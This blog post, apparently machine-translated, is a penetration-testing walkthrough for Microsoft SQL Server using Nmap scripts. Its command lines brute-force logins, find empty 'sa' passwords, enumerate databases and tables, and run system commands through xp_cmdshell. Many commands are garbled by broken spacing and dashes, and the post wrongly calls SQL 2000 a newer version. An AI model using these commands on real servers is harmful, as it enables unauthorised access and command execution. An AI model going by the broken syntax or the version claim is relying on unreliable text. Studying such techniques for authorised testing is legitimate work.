SQL pen test with Nmap and Nmap script Engine

The Nmap Scripting Engine allows us to use Nmap in addition scanner port and as a complete platform penetrationse testing.

In this post we will deal with some techniques that we can apply in a network to check on Us.

Generally SQL databases play by default on 1433.

By opening nmap we can give the following command:

Nmap - p1433 - ms-sql-info xxx.xxx.xxx.xxx (ip SQL ), the combination of nmap & Nmap Script Engine gives us information immediately about the SQL version, as well as the instance name.

nmap1

In the nmap script engine there is ms-sql-brute that will check for passwords.

nmap-2

The command is nmap -p1433 –script ms-sql-brute xxx.xxx.xxx.xxx if we do not find anything we can use some custom password list, the command will be if we consider that the file with the passwords is pass.txt .

nmap -p1433 -script ms-sql-brute -script-args userdb = / var / pass.txt, passdb = / var / pass.txt

At the same time, the nmap script engine enables us to find null passwords in infrastructures with Microsoft SQL server.

The order would be as follows

Nmap - p1433 –script ms-sql-empty-password xxx.xxx.xxx.xxx

Here we see that the sa account does not have a password, to find which, which databases or sa has access we will use the ms-sql-hasdbaccess script with the following arguments:

Nmap - p1433 - -script ms-sql-hasdbaccess.nse - -script-args mssql.username = sa xxx.xxx.xxx.xxx

Then we will find the tables from the databases with the following command.

Nmap -p1433 - -script ms-sql-tables -script-args msql.username = sa xxx.xxx.xxx.xxx

In newer versions of MSSQL (SQL 2000) xp_cmdshell is enabled by default and we can execute   of operating system commands through Nmap scripts such as.

Nmap –p1433 - -script ms-sql-xp-cmdshell - - script-args mssql.username = sa xxx.xxx.xxx.xxx

At Continuity

Nmap -p1433 – -script ms-sql-xp-cmdshell – -script –args=ms-sql-xp-cmdshell.cmd='net users' ,mssql.username=sa xxx.xxx.xxx.xxx

Also we should say that we can use nmap & nmap script engine with other tools like john the ripper. With john the ripper we can extract the database password hashes to proceed to a password  .

 

We thank her warmly SecTeam  @johnzontos.

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.

Written by Dimitris

Dimitris hates on Mondays .....

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).